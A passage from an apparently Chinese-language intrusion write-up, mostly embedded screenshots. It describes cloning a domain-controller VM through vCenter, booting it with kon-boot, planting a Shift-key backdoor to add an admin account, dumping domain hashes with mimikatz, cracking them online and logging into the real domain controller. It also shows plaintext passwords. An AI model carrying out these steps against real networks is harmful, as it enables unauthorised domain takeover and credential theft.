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
<p blockindex=32>至此就能够登录该域控克隆主机<br>
<img src=data:image/png;base64,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
<p blockindex=33>总结一下上述攻击过程为：克隆虚拟机-&gt;挂载CD/DVD为kon_boot.iso-&gt;利用shift后门弹出cmd.exe并添加管理员用户-&gt;登录域控克隆主机。</p>
<h4 blockindex=34>域内信息搜集</h4>
<p blockindex=35>利用上面步骤中 vcenter服务器攻击最后添加的账号test/Admin@123进入域控克隆主机，进行域内信息搜集：<br>
<img src="data:image/png;base64,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
<p blockindex=36>利用mimikatz导出所有用户hash，利用CMD5在线破解成功用户ZXX.COM\backupuser明文密码为admiN@123<br>
<img src="data:image/png;base64,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
<p blockindex=37>值得注意的是backupuser是域管理员权限，利用账号backupuser/NNN@123登录真正的域控主机<br>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACHAAAAUZCAYAAAAB4GQ7AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzd13NdV5r39+/a4eRzkBMRCYIESTCJpAKp0GFand8p+52y23aVL97yP2C7fOsb/we+9MVcuMZV71vj19VT70yr1ZJamQoUJTETACNIBCLnE/feyxcHoBgAiaRAUWr9PlUsEuvs8Oy1195QaT3nWebshYv2yvAwu/v72bNnNyIiIiIiIiIiIiIiIiIiIiLy3VleWcGx1j7tOERERERERERERERERERERER+1JwoilAKh4iIiIiIiIiIiIiIiIiIiMjTU63AoSocIiIiIiIiIiIiIiIiIiIiIk+Ng+pviIiIiIiIiIiIiIiIiIiIiDxVjvI3RERERERERERERERERERERJ6u6hIqIiIiIiIiIiIiIiIiIiIiIvLUeFt1oCiKCIIAbITjGIzjYIyDASwGAGPM2taGO/8UERERERERERERERERERER+ZHztqoCRyGfZ2Z6htV8Hs/ziSfjxGIxfN/DdVwcx8F1XVzXwTEOjuuwnshhjIPjOA8cs5rkoUwPERERERERERERERERERER+du2ZRU4FhfmGRq+wYXBWZaWXZqbMmRzPrmsR22NTy4bI5n0ifk+vu/jeR6u6+E4LsZxcR0H4zh3kj2M41QreWBw3LU2le0QERERERERERERERERERGRv0FblsARhAG3bxd4970lvjzrUlvnEU9AMmfI5GLU1bq0tbrs7Tdsaw6Ix0N8r0A8ZonHHFzHwXUh5htivofveWuJGy7xeJxkMoXrulsVroiIiIiIiIiIiIiIiIiIiMj3xpYlcIRBwPRMidHxgFu3XSZXwLguJpbAi6WIxdL0dKapb43R1weeB2EUUbIR5QpEFsKogmNCfNfguw5xP6ImVWFyaoptbduora3dqnBFREREREREREREREREREREvje2rgJHEDI3V2FxKQIHyliwQOBA5ELBJ56Ks5xPU1vrkIx